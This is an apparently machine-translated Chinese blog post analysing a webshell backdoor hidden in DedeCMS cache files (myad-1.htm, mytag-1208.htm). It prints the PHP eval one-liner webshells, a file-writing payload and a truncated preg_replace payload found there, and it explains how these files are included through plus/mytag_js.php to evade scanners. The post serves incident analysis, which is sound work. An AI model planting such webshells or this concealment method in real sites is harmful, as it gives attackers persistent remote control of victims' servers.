隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件)

2021-08-23 0 1,145

该单位一个站点使用的 DEDECM 今天由一家黑色的 broad getshell 公司提交给 wooyun.com

为了恢复黑阔入侵的技术，Guige 的 getshell 测试没有成功。你有没有得到一次机会就不会再成功了？
但是，我只能打包代码。我只能用各种 webshell 扫描仪扫描 data/tplcache/xxxxx.inc 文件。文件代码如下：

{dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}

但是我在所有的 web 目录中都找不到 90sec.php 文件。一位朋友指出可能是其他文件，包括这个文件。然后我使用 Seay 的代码审计工具定义了各种关键字，但仍然找不到它们。
最后，老板转到 data/cache 目录，找到几个 HTM 文件，myad-1.HTM、myad-16.HTM、mytag-1208.HTM 等。用以下代码打开这些 HTML 文件：

document.write(“dedecmsisok<?php@eval($_POST[cmd]);?>”);

Select Code

Copy

document.write(“axxxxx’);echo‘OK’;@fclose($fp);?>”);

Select Code

Copy

document.write(“<?php$fp =@fopen(‘av.php’, ‘a’);@fwrite($fp,‘<?php eval($_POST[110])?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

Select Code

Copy

document.write(“<?phpecho ‘dedecms 5.70day<br>guige,90sec.org’;@preg_replace(‘/[copyright]/e’,


看到这些文件真奇怪。我不知道黑阔想要什么？？虽然代码看起来很熟悉，但 HTML 文件可以用作后门吗？想想我的朋友说的 include，然后结合前一段时间 getshell 漏洞攻击的细节，最后转到 plus/mytag_Js.php 文件。在这个文件中，我终于找到了一个黑色、宽阔、肆无忌惮的地方。主要代码如下：
看到上面的代码，我们应该知道黑阔有多邪恶。在生成的 HTM 格式缓存文件中编写各种类型的一句代码，然后修改 plus/ad_Js.php 和 mytag_Js.php 文件，包括 HTM 格式的缓存文件。这样，黑阔只需在菜刀中填写以下 URL 即可连接一句话
http://www.xxx.com/plus/mytag_ js.php？id=1208
http://www.xxx.com/plus/ad_ js.php？id=1
特定 ID 和文件名与 data/cache 目录中的 myad-1.htm 和 mytag-1208.htm 相关。因此，各种 web shell 扫描仪不会扫描 web shell 后门文件，因为许多默认情况下不会扫描 HTM

转载请注明：汇站网 » 隐藏后门的特殊 DEDE 方法(dedecms 漏洞 90sec.php 文件)

赏

微信扫一扫

支付宝扫一扫

感谢您的来访，获取更多精彩资源请收藏本站。

本站声明

本资源仅用于个人学习和研究使用，禁止用于任何商业环境！

1.  本网站名称：汇站网
2.  本站永久网址：https://www.huizhanii.com/
3.  本站所有资源来源于网友投稿和高价购买，所有资源仅对编程人员及源代码爱好者开放下载做参考和研究及学习，本站不提供任何技术服务！
4.  未经原版权作者许可,禁止用于任何商业环境，任何人不得擅作它用，下载者不得用于违反国家法律，否则发生的一切法律后果自行承担！
5.  为尊重作者版权，请在下载24小时内删除！请购买原版授权作品，支持你喜欢的作者，谢谢！
6.  若资源侵犯了您的合法权益，请持您的版权证书和相关原作品信息来信通知我们请来信     我们会及时删除，给您带来的不便，我们深表歉意！
7.  如下载链接失效、广告或者压缩包问题请联系站长处理！
8.  如果你也有好源码或者教程，可以发布到网站，分享有金币奖励和额外收入！
9.  本站资源售价只是赞助，收取费用仅维持本站的日常运营所需！
10.  因源码具有可复制性，一经赞助，不得以任何形式退款。
11.  更多详情请点击查看

汇站网织梦教程隐藏后门的特殊DEDE方法(dedecms漏洞90sec.php文件) https://www.huizhanii.com/15232.html